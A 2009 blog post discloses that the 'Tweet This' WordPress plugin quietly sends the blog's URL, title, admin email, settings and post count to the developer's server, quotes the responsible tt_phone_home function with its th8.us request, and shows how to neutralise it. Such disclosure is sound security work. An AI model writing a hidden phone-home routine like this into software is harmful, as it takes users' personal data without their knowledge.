Posts Tagged ‘plugin’

“Tweet This” WordPress Plugin Phones Home

Sunday, April 19th, 2009

Before installing any WordPress plugin for security reasons I always examine the plugin source code which is not a problem for me given my ten years developing in PHP. However I don’t expect the usual WordPress user to have this kind of knowledge most of which don’t even have any experience in PHP at all.

Thus when I was just reading the source code for the Tweet This plugin I was shocked to see that on both activation and deactivation of the plugin it  automatically transfers the following information to the developer’s website:

  • URL of your blog
  • Tweet This version
  • status (activated, deactivated)
  • number of posts in your blog
  • title of your blog
  • description of your blog
  • language of your blog
  • your email address
  • Tweet This plugin settings
  • WordPress version

This is actually the code snippet taken directly from the source code – no, I didn’t add the “Big brother” there, that’s how it’s written in the code:

// Big brother is watching.
function tt_phone_home($status) {
    global $current_site; global $wpdb; $wpv = get_bloginfo('version');
    $siteURL = $current_site->domain; $blogURL = get_bloginfo('url');
    $title = get_bloginfo('name'); $email = get_bloginfo('admin_email');
    $description = get_bloginfo('description');
    $lang = get_bloginfo('language');
    $posts = number_format($wpdb->get_var("SELECT COUNT(*)
    FROM $wpdb->posts WHERE post_status = 'publish'"));
    $settings = $wpdb->get_var("SELECT option_value
    FROM $wpdb->options WHERE option_name = 'tweet_this_settings'");
    $phone = tt_read_file('http://th8.us/ttph.php?s=' . $siteURL . '&b=' .
        $blogURL . '&v=1.3.9&u=' . $status . '&p=' . $posts . '&t=' .
        urlencode($title) . '&d=' . urlencode($description) . '&l=' .
        urlencode($lang) . '&e=' . urlencode($email) . '&w=' . $wpv .
        '&x=' . urlencode($settings));
}

So if you don’t want all this information to be transferred to the developer prior to activating the plugin you should simply add a “return;” right after the function definition leaving the rest untouched.

function tt_phone_home($status) {
  return;

That way the function will return right away and not calling any URL at all. I’m not telling that the developer is doing anything harmful with that plugin yet I don’t see any reason in transferring this information to his server.

tweetthis-15

Tags: , , ,
Posted in Security, WordPress | No Comments »